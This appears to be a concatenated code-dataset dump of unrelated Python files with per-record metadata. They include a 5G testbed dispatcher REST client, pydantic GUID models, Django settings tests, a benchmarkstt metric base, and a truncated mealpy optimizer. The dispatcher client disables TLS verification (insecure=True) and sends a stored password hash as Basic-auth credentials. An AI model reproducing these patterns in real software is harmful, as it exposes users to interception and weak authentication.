maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
empty = LogInfo.Empty()
return {'PreRun': empty, 'Executor': empty, 'PostRun': empty, 'Status': maybeError}
token = user.CurrentDispatcherToken
url = f'/elcmexecution/{executionId}/logs'
response = self.HttpGet(url, extra_headers=self.bearerAuthHeader(token))
return RestClient.ResponseToJson(response)
def basicGet(self, user: User, url: str, kind: str) -> Tuple[object, Optional[str]]:
try:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
return {}, maybeError
token = user.CurrentDispatcherToken
response = self.HttpGet(url, extra_headers=self.bearerAuthHeader(token))
return self.ResponseToJson(response), None
except Exception as e:
return {}, f"Exception while retrieving list of {kind}: {e}"
def GetVimLocations(self, user: User) -> Tuple[List[VimInfo], Optional[str]]:
data, error = self.basicGet(user, '/mano/vims', 'VIMs') # type: List, Optional[str]
return [VimInfo(vim) for vim in data] if error is None else [], error
def GetVimLocationImages(self, user: User, vim_name: str) -> Tuple[List[VimInfo], Optional[str]]:
data, error = self.basicGet(user, '/mano/image', f"images for VIM '{vim_name}'") # type: Dict, Optional[str]
return data.get(vim_name, []) if error is None else [], error
def GetAvailableVnfds(self, user: User) -> Tuple[List[str], Optional[str]]:
data, error = self.basicGet(user, '/mano/vnfd', f"VNFDs") # type: Dict, Optional[str]
return data if error is None else [], error
def GetAvailableNsds(self, user: User) -> Tuple[List[str], Optional[str]]:
data, error = self.basicGet(user, '/mano/nsd', f"NSDs") # type: Dict, Optional[str]
return data if error is None else [], error
def handleErrorcodes(self, code: int, data: Dict, overrides: Dict[int, str] = None) -> str:
defaults = {
400: "Invalid Input",
401: "Invalid permission",
404: "Not found",
406: "File not valid",
409: "Conflict",
413: "File too large",
422: "Unprocessable entity",
500: "Internal server error" # Or an unknown error code
}
overrides = {} if overrides is None else overrides
error = overrides.get(code, defaults.get(code, defaults[500]))
if code in [400, 404, 409, 422]:
extra = f" (Status: {data['status']}, Code: {data['code']}, Detail: {data['detail']})"
elif code == 401:
extra = ""
else:
extra = f" (Code {code})"
return error + extra
def OnboardVnfd(self, path: str, token: str, visibility: bool) -> Tuple[str, bool]:
"""Returns a pair of str (id or error message) and bool (success)"""
url = '/mano/vnfd'
overrides = {409: "Conflict - VNFD already present"}
return self._onboardVnfdOrNsd(url, path, token, 'VNFs', overrides, visibility)
def OnboardNsd(self, path: str, token: str, visibility: bool) -> Tuple[str, bool]:
"""Returns a pair of str (id or error message) and bool (success)"""
url = '/mano/nsd'
overrides = {409: "Conflict - NSD already present"}
return self._onboardVnfdOrNsd(url, path, token, "NSs", overrides, visibility)
def _onboardVnfdOrNsd(self, url: str, path: str, token: str, dictId: str, overrides: Dict, visibility: bool):
with open(path, "br") as file:
data = {'visibility': str(visibility).lower()}
response = self.HttpPost(url, extra_headers=self.bearerAuthHeader(token), files={'file': file},
body=data, payload=Payload.Form)
code = self.ResponseStatusCode(response)
data = self.ResponseToJson(response)
if code == 200:
try:
return list(data[dictId].keys())[0], True
except (KeyError, IndexError, AttributeError):
return split(path)[1], True
elif code == 400:
try:
return data['error'], False
except KeyError:
return str(data), False
else:
return self.handleErrorcodes(code, data, overrides), False
def OnboardVim(self, path: str, vimName: str, token: str, visibility: str) -> Optional[str]:
"""Returns an error message, or None on success"""
with open(path, "br") as file:
containerFormat = "bare"
data = {'vim_id': vimName, 'container_format': containerFormat,
'visibility': str(visibility).lower()}
response = self.HttpPost('/mano/image', extra_headers=self.bearerAuthHeader(token),
body=data, files={'file': file}, payload=Payload.Form)
code = self.ResponseStatusCode(response)
if 200 <= code <= 299:
return None
else:
try:
data = self.ResponseToJson(response)
return data.get('detail', data.get('result', f'Unknown error. Status code: {code}'))
except Exception as e:
raise Exception(f"Unknown exception '{e}'. Status code: {code}")
| import json
from typing import Dict, Tuple, Optional, List
from app.models import User, Experiment
from .restClient import RestClient, Payload
from base64 import b64encode
from Helper import Config, Log, LogInfo
from app import db
from datetime import datetime, timezone
from os.path import split
class VimInfo:
def __init__(self, data):
self.Name = data['name']
self.Type = data['type']
self.Location = data['location']
def __str__(self):
return f'{self.Name} ({self.Type} - {self.Location})'
class DispatcherApi(RestClient):
def __init__(self):
config = Config().Dispatcher
super().__init__(config.Host, config.Port, "", https=True, insecure=True)
self.tokenExpiry = config.TokenExpiry
@staticmethod
def basicAuthHeader(user: str, password: str) -> Dict:
encoded = b64encode(bytes(f'{user}:{password}'.encode('ascii')))
return {'Authorization': f'Basic {encoded.decode("ascii")}'}
@staticmethod
def bearerAuthHeader(token: str) -> Dict:
return {'Authorization': f'Bearer {token}'}
def Register(self, user: User) -> Tuple[str, bool]:
""" Returns (<message>, <success>). """
url = '/auth/register'
data = {
'username': user.username,
'email': user.email,
'password': <PASSWORD>
}
try:
response = self.HttpPost(url, body=data, payload=Payload.Form)
status = self.ResponseStatusCode(response)
if status in [400, 200]:
message = self.ResponseToJson(response)['result']
return message, (status == 200)
else:
raise Exception(f"Status {status} ({response.reason})")
except Exception as e:
return f"Exception while accessing authentication: {e}", False
def GetToken(self, user: User) -> Tuple[str, bool]:
"""
Return a tuple (str, bool). The string contains the token OR the
error message, the boolean indicates success.
"""
url = '/auth/get_token'
try:
response = self.HttpGet(url, extra_headers=self.basicAuthHeader(user.username, user.password_hash))
status = self.ResponseStatusCode(response)
if status in [400, 200]:
result = self.ResponseToJson(response)['result']
return result, (status == 200)
else:
raise Exception(f"Status {status} ({response.reason})")
except Exception as e:
message = f"Error while retrieving token: {e}"
Log.E(message)
return message, False
def RenewUserToken(self, user: User) -> Optional[str]:
"""Returns None if no error, an error message otherwise"""
token, success = self.GetToken(user)
user.token = token if success else None
user.tokenTimestamp = datetime.now(timezone.utc) if success else None
db.session.add(user)
db.session.commit()
return token if not success else None
def RenewUserTokenIfExpired(self, user) -> Optional[str]:
"""Returns None if no error, an error message otherwise"""
tokenTimestamp = user.tokenTimestamp if user.tokenTimestamp is not None else datetime.min
tokenTimestamp = tokenTimestamp.replace(tzinfo=timezone.utc)
timespan = datetime.now(timezone.utc) - tokenTimestamp
if timespan.total_seconds() >= self.tokenExpiry:
return self.RenewUserToken(user)
else:
return None
def RunCampaign(self, experimentId: int, user: User) -> Dict:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
return {"ExecutionId": None, "Success": False, "Message": maybeError}
token = user.CurrentDispatcherToken
descriptor = json.dumps(Experiment.query.get(experimentId).serialization())
url = f'/elcm/api/v0/run'
response = self.HttpPost(url, {'Content-Type': 'application/json', **self.bearerAuthHeader(token)}, descriptor)
status = RestClient.ResponseStatusCode(response)
if status != 200:
return {"ExecutionId": None, "Success": False,
"Message": f"Execution request failed with status {status}"}
else:
response = RestClient.ResponseToJson(response)
response.update({"Success": True, "Message": "No error"})
return response
def GetExecutionLogs(self, executionId: int, user: User) -> Dict:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
empty = LogInfo.Empty()
return {'PreRun': empty, 'Executor': empty, 'PostRun': empty, 'Status': maybeError}
token = user.CurrentDispatcherToken
url = f'/elcmexecution/{executionId}/logs'
response = self.HttpGet(url, extra_headers=self.bearerAuthHeader(token))
return RestClient.ResponseToJson(response)
def basicGet(self, user: User, url: str, kind: str) -> Tuple[object, Optional[str]]:
try:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
return {}, maybeError
token = user.CurrentDispatcherToken
response = self.HttpGet(url, extra_headers=self.bearerAuthHeader(token))
return self.ResponseToJson(response), None
except Exception as e:
return {}, f"Exception while retrieving list of {kind}: {e}"
def GetVimLocations(self, user: User) -> Tuple[List[VimInfo], Optional[str]]:
data, error = self.basicGet(user, '/mano/vims', 'VIMs') # type: List, Optional[str]
return [VimInfo(vim) for vim in data] if error is None else [], error
def GetVimLocationImages(self, user: User, vim_name: str) -> Tuple[List[VimInfo], Optional[str]]:
data, error = self.basicGet(user, '/mano/image', f"images for VIM '{vim_name}'") # type: Dict, Optional[str]
return data.get(vim_name, []) if error is None else [], error
def GetAvailableVnfds(self, user: User) -> Tuple[List[str], Optional[str]]:
data, error = self.basicGet(user, '/mano/vnfd', f"VNFDs") # type: Dict, Optional[str]
return data if error is None else [], error
def GetAvailableNsds(self, user: User) -> Tuple[List[str], Optional[str]]:
data, error = self.basicGet(user, '/mano/nsd', f"NSDs") # type: Dict, Optional[str]
return data if error is None else [], error
def handleErrorcodes(self, code: int, data: Dict, overrides: Dict[int, str] = None) -> str:
defaults = {
400: "Invalid Input",
401: "Invalid permission",
404: "Not found",
406: "File not valid",
409: "Conflict",
413: "File too large",
422: "Unprocessable entity",
500: "Internal server error" # Or an unknown error code
}
overrides = {} if overrides is None else overrides
error = overrides.get(code, defaults.get(code, defaults[500]))
if code in [400, 404, 409, 422]:
extra = f" (Status: {data['status']}, Code: {data['code']}, Detail: {data['detail']})"
elif code == 401:
extra = ""
else:
extra = f" (Code {code})"
return error + extra
def OnboardVnfd(self, path: str, token: str, visibility: bool) -> Tuple[str, bool]:
"""Returns a pair of str (id or error message) and bool (success)"""
url = '/mano/vnfd'
overrides = {409: "Conflict - VNFD already present"}
return self._onboardVnfdOrNsd(url, path, token, 'VNFs', overrides, visibility)
def OnboardNsd(self, path: str, token: str, visibility: bool) -> Tuple[str, bool]:
"""Returns a pair of str (id or error message) and bool (success)"""
url = '/mano/nsd'
overrides = {409: "Conflict - NSD already present"}
return self._onboardVnfdOrNsd(url, path, token, "NSs", overrides, visibility)
def _onboardVnfdOrNsd(self, url: str, path: str, token: str, dictId: str, overrides: Dict, visibility: bool):
with open(path, "br") as file:
data = {'visibility': str(visibility).lower()}
response = self.HttpPost(url, extra_headers=self.bearerAuthHeader(token), files={'file': file},
body=data, payload=Payload.Form)
code = self.ResponseStatusCode(response)
data = self.ResponseToJson(response)
if code == 200:
try:
return list(data[dictId].keys())[0], True
except (KeyError, IndexError, AttributeError):
return split(path)[1], True
elif code == 400:
try:
return data['error'], False
except KeyError:
return str(data), False
else:
return self.handleErrorcodes(code, data, overrides), False
def OnboardVim(self, path: str, vimName: str, token: str, visibility: str) -> Optional[str]:
"""Returns an error message, or None on success"""
with open(path, "br") as file:
containerFormat = "bare"
data = {'vim_id': vimName, 'container_format': containerFormat,
'visibility': str(visibility).lower()}
response = self.HttpPost('/mano/image', extra_headers=self.bearerAuthHeader(token),
body=data, files={'file': file}, payload=Payload.Form)
code = self.ResponseStatusCode(response)
if 200 <= code <= 299:
return None
else:
try:
data = self.ResponseToJson(response)
return data.get('detail', data.get('result', f'Unknown error. Status code: {code}'))
except Exception as e:
raise Exception(f"Unknown exception '{e}'. Status code: {code}") | en | 0.374407 | Returns (<message>, <success>). Return a tuple (str, bool). The string contains the token OR the error message, the boolean indicates success. Returns None if no error, an error message otherwise Returns None if no error, an error message otherwise # type: List, Optional[str] # type: Dict, Optional[str] # type: Dict, Optional[str] # type: Dict, Optional[str] # Or an unknown error code Returns a pair of str (id or error message) and bool (success) Returns a pair of str (id or error message) and bool (success) Returns an error message, or None on success | 2.523205 | 3 |
ultron8/api/models/guid.py | bossjones/ultron8 | 0 | 6616708 | <filename>ultron8/api/models/guid.py
"""Pydantic serializers for managing (de)serializationand doc generation."""
from datetime import datetime, timedelta, timezone
import logging
from typing import Union
from pydantic import BaseModel, validator
from ultron8.api.models.base import BaseDataModel
# pylint: disable=no-self-argument
log = logging.getLogger(__name__)
# Properties to receive on item creation
class GuidCreate(BaseDataModel):
name: str
class GuidIn(BaseDataModel):
"""
Serializer for creating a record.
Formats data, so that it'll play nicely w/ the DB.
Also, sets defaults for `expire`.
"""
expire: datetime = None
name: str
@validator("expire", pre=True, always=True)
def set_expire(cls, v):
"""Set expire time as 30 days from now, if not specified."""
if v is None:
return datetime.now(timezone.utc) + timedelta(days=30)
return v
@validator("expire", always=True)
def set_tz(cls, v):
"""After initial validation logic, add utc as the timezone."""
return v.replace(tzinfo=timezone.utc)
class GuidUpdate(BaseDataModel):
"""
Serializer for updating a record.
Formats data, so that it'll play nicely w/ the DB.
"""
expire: datetime = None
name: str = None
class GuidOut(BaseDataModel):
"""Serialize output, that'll be sent to the end user properly."""
id: str
expire: datetime
name: str
@validator("expire")
def check_expire(cls, v: Union[datetime, str]) -> str:
"""Coerce expire into being Unix Time."""
if type(v) == str:
v = datetime.fromisoformat(v)
return str(int(v.replace(tzinfo=timezone.utc).timestamp()))
| <filename>ultron8/api/models/guid.py
"""Pydantic serializers for managing (de)serializationand doc generation."""
from datetime import datetime, timedelta, timezone
import logging
from typing import Union
from pydantic import BaseModel, validator
from ultron8.api.models.base import BaseDataModel
# pylint: disable=no-self-argument
log = logging.getLogger(__name__)
# Properties to receive on item creation
class GuidCreate(BaseDataModel):
name: str
class GuidIn(BaseDataModel):
"""
Serializer for creating a record.
Formats data, so that it'll play nicely w/ the DB.
Also, sets defaults for `expire`.
"""
expire: datetime = None
name: str
@validator("expire", pre=True, always=True)
def set_expire(cls, v):
"""Set expire time as 30 days from now, if not specified."""
if v is None:
return datetime.now(timezone.utc) + timedelta(days=30)
return v
@validator("expire", always=True)
def set_tz(cls, v):
"""After initial validation logic, add utc as the timezone."""
return v.replace(tzinfo=timezone.utc)
class GuidUpdate(BaseDataModel):
"""
Serializer for updating a record.
Formats data, so that it'll play nicely w/ the DB.
"""
expire: datetime = None
name: str = None
class GuidOut(BaseDataModel):
"""Serialize output, that'll be sent to the end user properly."""
id: str
expire: datetime
name: str
@validator("expire")
def check_expire(cls, v: Union[datetime, str]) -> str:
"""Coerce expire into being Unix Time."""
if type(v) == str:
v = datetime.fromisoformat(v)
return str(int(v.replace(tzinfo=timezone.utc).timestamp()))
| en | 0.873957 | Pydantic serializers for managing (de)serializationand doc generation. # pylint: disable=no-self-argument # Properties to receive on item creation Serializer for creating a record. Formats data, so that it'll play nicely w/ the DB. Also, sets defaults for `expire`. Set expire time as 30 days from now, if not specified. After initial validation logic, add utc as the timezone. Serializer for updating a record. Formats data, so that it'll play nicely w/ the DB. Serialize output, that'll be sent to the end user properly. Coerce expire into being Unix Time. | 2.513733 | 3 |
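The expire default above is easier to see in isolation. The sketch below reimplements the same validator on a plain pydantic v1 BaseModel purely for illustration, since BaseDataModel lives elsewhere in the project.

# Illustrative only: GuidIn actually inherits BaseDataModel, not BaseModel.
from datetime import datetime, timedelta, timezone
from pydantic import BaseModel, validator

class GuidInSketch(BaseModel):
    expire: datetime = None
    name: str

    @validator("expire", pre=True, always=True)
    def set_expire(cls, v):
        # default to 30 days from now when the caller omits expire
        return v if v is not None else datetime.now(timezone.utc) + timedelta(days=30)

print(GuidInSketch(name="demo").expire)  # roughly now + 30 days, UTC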
app/admin/tests/tests_models.py | zollf/CITS3200 | 0 | 6616709 | from faker.factory import Factory
from factory.django import DjangoModelFactory
from django.test import TestCase
from ..models import Settings
from assertpy import assert_that
faker = Factory.create()
class SettingsFactory(DjangoModelFactory):
key = faker.word()
label = faker.word()
value = faker.phone_number()
type = 'text'
class Meta:
model = Settings
class SettingsModelTest(TestCase):
def setUp(self):
"""Create a new fake key"""
self.fake_key = faker.word()
self.fake_setting = SettingsFactory(key=self.fake_key)
def test_getKeys(self):
"""Should return new fake key"""
assert_that(Settings.getKeys()).contains(self.fake_key)
def test_getDict(self):
"""Should return settings dictionary"""
settings = Settings.getDict()
self.assertEqual(settings[self.fake_key], self.fake_setting.value)
def test_settings(self):
"Settings Model"
setting = SettingsFactory()
self.assertEqual(setting.key, Settings.objects.get(pk=setting.id).key)
setting.delete()
with self.assertRaises(Settings.DoesNotExist):
Settings.objects.get(pk=setting.id)
| from faker.factory import Factory
from factory.django import DjangoModelFactory
from django.test import TestCase
from ..models import Settings
from assertpy import assert_that
faker = Factory.create()
class SettingsFactory(DjangoModelFactory):
key = faker.word()
label = faker.word()
value = faker.phone_number()
type = 'text'
class Meta:
model = Settings
class SettingsModelTest(TestCase):
def setUp(self):
"""Create a new fake key"""
self.fake_key = faker.word()
self.fake_setting = SettingsFactory(key=self.fake_key)
def test_getKeys(self):
"""Should return new fake key"""
assert_that(Settings.getKeys()).contains(self.fake_key)
def test_getDict(self):
"""Should return settings dictionary"""
settings = Settings.getDict()
self.assertEqual(settings[self.fake_key], self.fake_setting.value)
def test_settings(self):
"Settings Model"
setting = SettingsFactory()
self.assertEqual(setting.key, Settings.objects.get(pk=setting.id).key)
setting.delete()
with self.assertRaises(Settings.DoesNotExist):
Settings.objects.get(pk=setting.id)
| en | 0.413187 | Create a new fake key Should return new fake key Should return settings dictionary | 2.616485 | 3 |
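One caveat about the factory above: faker.word() is evaluated once, when the class body is executed, so every SettingsFactory() instance shares the same key, label and value unless they are overridden (which setUp does for key). If per-instance values were wanted, factory_boy's lazy declarations would be the usual route; the variant below is only a sketch, and the "admin.Settings" model label is an assumption.

# Hypothetical per-instance variant using lazy faker declarations.
import factory

class LazySettingsFactory(factory.django.DjangoModelFactory):
    key = factory.Faker("word")        # re-evaluated for every instance
    label = factory.Faker("word")
    value = factory.Faker("phone_number")
    type = "text"

    class Meta:
        model = "admin.Settings"       # app label assumed; the model class itself also works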
src/benchmarkstt/metrics/__init__.py | ioannisNoukakis/benchmarkstt | 1 | 6616710 | from benchmarkstt.schema import Schema
from benchmarkstt.factory import Factory
class Base:
"""
Base class for metrics
"""
def compare(self, ref: Schema, hyp: Schema):
raise NotImplementedError()
factory = Factory(Base)
| from benchmarkstt.schema import Schema
from benchmarkstt.factory import Factory
class Base:
"""
Base class for metrics
"""
def compare(self, ref: Schema, hyp: Schema):
raise NotImplementedError()
factory = Factory(Base)
| en | 0.725228 | Base class for metrics | 2.314251 | 2 |
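A usable metric would subclass Base and implement compare. The toy example below is an illustration only (it is not part of benchmarkstt) and treats Schema as a plain sequence of items, which may not hold for the real class.

# Hypothetical metric; assumes Schema behaves like a sequence.
class LengthDifference(Base):
    def compare(self, ref: Schema, hyp: Schema):
        # positive when the hypothesis has more items than the reference
        return len(hyp) - len(ref)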
mealpy/swarm_based/NMRA.py | lamto20132223/mealpy | 2 | 6616711 | <reponame>lamto20132223/mealpy
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "<NAME>" at 14:52, 17/03/2020 %
# %
# Email: <EMAIL> %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieunguyen5991 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, choice, normal, randint
from numpy import power, sin, pi, abs, zeros, sqrt, sign
from math import gamma
from copy import deepcopy
from mealpy.root import Root
class BaseNMR(Root):
"""
The original version of: Naked Mole-rat Algorithm (NMRA)
(The naked mole-rat algorithm)
Link:
        https://www.doi.org/10.1007/s00521-019-04464-7
"""
def __init__(self, root_paras=None, epoch=750, pop_size=100, bp=0.75):
Root.__init__(self, root_paras)
self.epoch = epoch
self.pop_size = pop_size
self.size_b = int(self.pop_size / 5)
self.size_w = self.pop_size - self.size_b
self.bp = bp # breeding probability (0.75)
def _train__(self):
pop = [self._create_solution__(minmax=0) for _ in range(self.pop_size)]
pop, g_best = self._sort_pop_and_get_global_best__(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
for i in range(self.pop_size):
temp = deepcopy(pop[i][self.ID_POS])
if i < self.size_b: # breeding operators
if uniform() < self.bp:
alpha = uniform()
temp = (1 - alpha) * pop[i][self.ID_POS] + alpha * (g_best[self.ID_POS] - pop[i][self.ID_POS])
else: # working operators
t1, t2 = choice(range(self.size_b, self.pop_size), 2, replace=False)
temp = pop[i][self.ID_POS] + uniform() * (pop[t1][self.ID_POS] - pop[t2][self.ID_POS])
fit = self._fitness_model__(temp)
if fit < pop[i][self.ID_FIT]:
pop[i] = [temp, fit]
pop, g_best = self._sort_pop_and_update_global_best__(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.print_train:
print("> Epoch: {}, Best fit: {}".format(epoch+1, g_best[self.ID_FIT]))
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class LevyNMR(BaseNMR):
"""
My speedup version of: Naked Mole-rat Algorithm (NMRA)
(The naked mole-rat algorithm)
"""
def __init__(self, root_paras=None, epoch=750, pop_size=100, bp=0.75):
BaseNMR.__init__(self, root_paras, epoch, pop_size, bp)
self.pm = 0.025
def _levy_flight__(self, epoch, solution, prey):
beta = 1
# muy and v are two random variables which follow normal distribution
# sigma_muy : standard deviation of muy
sigma_muy = power(gamma(1 + beta) * sin(pi * beta / 2) / (gamma((1 + beta) / 2) * beta * power(2, (beta - 1) / 2)),1 / beta)
# sigma_v : standard deviation of v
sigma_v = 1
muy = normal(0, sigma_muy**2)
v = normal(0, sigma_v**2)
s = muy / power(abs(v), 1 / beta)
# D is a random solution
D = self._create_solution__(minmax=self.ID_MIN_PROB)
LB = 0.001 * s * (solution[self.ID_POS] - prey[self.ID_POS])
levy = D[self.ID_POS] * LB
return levy
# x_new = solution[0] + 1.0/sqrt(epoch+1) * sign(uniform() - 0.5) * levy
# return x_new
def _crossover__(self, solution, g_best):
start_point = randint(0, self.problem_size / 2)
id1 = start_point
id2 = int(start_point + self.problem_size / 3)
id3 = int(self.problem_size)
new_temp = deepcopy(solution[self.ID_POS])
new_temp[0:id1] = g_best[self.ID_POS][0:id1]
new_temp[id1:id2] = solution[self.ID_POS][id1:id2]
new_temp[id2:id3] = g_best[self.ID_POS][id2:id3]
return new_temp
def _crossover_random__(self, pop, g_best):
start_point = randint(0, self.problem_size / 2)
id1 = start_point
id2 = int(start_point + self.problem_size / 3)
id3 = int(self.problem_size)
partner = pop[randint(0, self.pop_size)][self.ID_POS]
new_temp = zeros(self.problem_size)
new_temp[0:id1] = g_best[self.ID_POS][0:id1]
new_temp[id1:id2] = partner[id1:id2]
new_temp[id2:id3] = g_best[self.ID_POS][id2:id3]
return new_temp
### Mutation
def _mutation_flip_point__(self, parent, index):
w = deepcopy(parent)
w[index] = uniform(self.domain_range[0], self.domain_range[1])
return w
def _train__(self):
pop = [self._create_solution__(minmax=0) for _ in range(self.pop_size)]
pop, g_best = self._sort_pop_and_get_global_best__(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
for i in range(self.pop_size):
temp = deepcopy(pop[i][self.ID_POS])
# Exploration
if i < self.size_b: # breeding operators
if uniform() < self.bp:
alpha = uniform()
temp = pop[i][self.ID_POS] + alpha * (g_best[self.ID_POS] - pop[i][self.ID_POS])
else:
#temp = self._crossover__(pop[i], g_best)
temp = self._crossover_random__(pop, g_best)
# Exploitation
else: # working operators
if uniform() < 0.5:
t1, t2 = choice(range(self.size_b, self.pop_size), 2, replace=False)
temp = pop[i][self.ID_POS] + uniform() * (pop[t1][self.ID_POS] - pop[t2][self.ID_POS])
else:
temp = self._levy_flight__(epoch, pop[i], g_best)
# Mutation
for id in range(0, self.problem_size):
if uniform() < self.pm:
temp = self._mutation_flip_point__(temp, id)
#temp = self._random_amend_solution_and_return__(temp)
fit = self._fitness_model__(temp)
if fit < pop[i][self.ID_FIT]:
pop[i] = [temp, fit]
# xichma = power((gamma(1 + 1.5) * sin(pi * 1.5 / 2.0)) / (gamma((1 + 1.5) * 1.5 * power(2, (1.5 - 1) / 2)) / 2.0), 1.0 / 1.5)
# LF_D = 0.01 * uniform() * xichma / power(abs(uniform()), 1.0 / 1.5)
# J = 2 * (1 - uniform())
# w = 1 - (epoch + 1) * 1.0 / self.epoch
# Y = g_best[self.ID_POS] - w * abs(J * g_best[self.ID_POS] - pop[i][self.ID_POS])
# Z = Y + uniform(self.domain_range[0], self.domain_range[1], self.problem_size) * LF_D
#
# fit_Y = self._fitness_model__(Y)
# fit_Z = self._fitness_model__(Z)
# if fit_Y < pop[i][self.ID_FIT]:
# pop[i] = [Y, fit_Y]
# if fit_Z < pop[i][self.ID_FIT]:
# pop[i] = [Z, fit_Z]
pop, g_best = self._sort_pop_and_update_global_best__(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.print_train:
print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
| #!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "<NAME>" at 14:52, 17/03/2020 %
# %
# Email: <EMAIL> %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieunguyen5991 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, choice, normal, randint
from numpy import power, sin, pi, abs, zeros, sqrt, sign
from math import gamma
from copy import deepcopy
from mealpy.root import Root
class BaseNMR(Root):
"""
The original version of: Naked Mole-rat Algorithm (NMRA)
(The naked mole-rat algorithm)
Link:
        https://www.doi.org/10.1007/s00521-019-04464-7
"""
def __init__(self, root_paras=None, epoch=750, pop_size=100, bp=0.75):
Root.__init__(self, root_paras)
self.epoch = epoch
self.pop_size = pop_size
self.size_b = int(self.pop_size / 5)
self.size_w = self.pop_size - self.size_b
self.bp = bp # breeding probability (0.75)
def _train__(self):
pop = [self._create_solution__(minmax=0) for _ in range(self.pop_size)]
pop, g_best = self._sort_pop_and_get_global_best__(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
for i in range(self.pop_size):
temp = deepcopy(pop[i][self.ID_POS])
if i < self.size_b: # breeding operators
if uniform() < self.bp:
alpha = uniform()
temp = (1 - alpha) * pop[i][self.ID_POS] + alpha * (g_best[self.ID_POS] - pop[i][self.ID_POS])
else: # working operators
t1, t2 = choice(range(self.size_b, self.pop_size), 2, replace=False)
temp = pop[i][self.ID_POS] + uniform() * (pop[t1][self.ID_POS] - pop[t2][self.ID_POS])
fit = self._fitness_model__(temp)
if fit < pop[i][self.ID_FIT]:
pop[i] = [temp, fit]
pop, g_best = self._sort_pop_and_update_global_best__(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.print_train:
print("> Epoch: {}, Best fit: {}".format(epoch+1, g_best[self.ID_FIT]))
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class LevyNMR(BaseNMR):
"""
My speedup version of: Naked Mole-rat Algorithm (NMRA)
(The naked mole-rat algorithm)
"""
def __init__(self, root_paras=None, epoch=750, pop_size=100, bp=0.75):
BaseNMR.__init__(self, root_paras, epoch, pop_size, bp)
self.pm = 0.025
def _levy_flight__(self, epoch, solution, prey):
beta = 1
# muy and v are two random variables which follow normal distribution
# sigma_muy : standard deviation of muy
sigma_muy = power(gamma(1 + beta) * sin(pi * beta / 2) / (gamma((1 + beta) / 2) * beta * power(2, (beta - 1) / 2)),1 / beta)
# sigma_v : standard deviation of v
sigma_v = 1
muy = normal(0, sigma_muy**2)
v = normal(0, sigma_v**2)
s = muy / power(abs(v), 1 / beta)
# D is a random solution
D = self._create_solution__(minmax=self.ID_MIN_PROB)
LB = 0.001 * s * (solution[self.ID_POS] - prey[self.ID_POS])
levy = D[self.ID_POS] * LB
return levy
# x_new = solution[0] + 1.0/sqrt(epoch+1) * sign(uniform() - 0.5) * levy
# return x_new
def _crossover__(self, solution, g_best):
start_point = randint(0, self.problem_size / 2)
id1 = start_point
id2 = int(start_point + self.problem_size / 3)
id3 = int(self.problem_size)
new_temp = deepcopy(solution[self.ID_POS])
new_temp[0:id1] = g_best[self.ID_POS][0:id1]
new_temp[id1:id2] = solution[self.ID_POS][id1:id2]
new_temp[id2:id3] = g_best[self.ID_POS][id2:id3]
return new_temp
def _crossover_random__(self, pop, g_best):
start_point = randint(0, self.problem_size / 2)
id1 = start_point
id2 = int(start_point + self.problem_size / 3)
id3 = int(self.problem_size)
partner = pop[randint(0, self.pop_size)][self.ID_POS]
new_temp = zeros(self.problem_size)
new_temp[0:id1] = g_best[self.ID_POS][0:id1]
new_temp[id1:id2] = partner[id1:id2]
new_temp[id2:id3] = g_best[self.ID_POS][id2:id3]
return new_temp
### Mutation
def _mutation_flip_point__(self, parent, index):
w = deepcopy(parent)
w[index] = uniform(self.domain_range[0], self.domain_range[1])
return w
def _train__(self):
pop = [self._create_solution__(minmax=0) for _ in range(self.pop_size)]
pop, g_best = self._sort_pop_and_get_global_best__(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
for i in range(self.pop_size):
temp = deepcopy(pop[i][self.ID_POS])
# Exploration
if i < self.size_b: # breeding operators
if uniform() < self.bp:
alpha = uniform()
temp = pop[i][self.ID_POS] + alpha * (g_best[self.ID_POS] - pop[i][self.ID_POS])
else:
#temp = self._crossover__(pop[i], g_best)
temp = self._crossover_random__(pop, g_best)
# Exploitation
else: # working operators
if uniform() < 0.5:
t1, t2 = choice(range(self.size_b, self.pop_size), 2, replace=False)
temp = pop[i][self.ID_POS] + uniform() * (pop[t1][self.ID_POS] - pop[t2][self.ID_POS])
else:
temp = self._levy_flight__(epoch, pop[i], g_best)
# Mutation
for id in range(0, self.problem_size):
if uniform() < self.pm:
temp = self._mutation_flip_point__(temp, id)
#temp = self._random_amend_solution_and_return__(temp)
fit = self._fitness_model__(temp)
if fit < pop[i][self.ID_FIT]:
pop[i] = [temp, fit]
# xichma = power((gamma(1 + 1.5) * sin(pi * 1.5 / 2.0)) / (gamma((1 + 1.5) * 1.5 * power(2, (1.5 - 1) / 2)) / 2.0), 1.0 / 1.5)
# LF_D = 0.01 * uniform() * xichma / power(abs(uniform()), 1.0 / 1.5)
# J = 2 * (1 - uniform())
# w = 1 - (epoch + 1) * 1.0 / self.epoch
# Y = g_best[self.ID_POS] - w * abs(J * g_best[self.ID_POS] - pop[i][self.ID_POS])
# Z = Y + uniform(self.domain_range[0], self.domain_range[1], self.problem_size) * LF_D
#
# fit_Y = self._fitness_model__(Y)
# fit_Z = self._fitness_model__(Z)
# if fit_Y < pop[i][self.ID_FIT]:
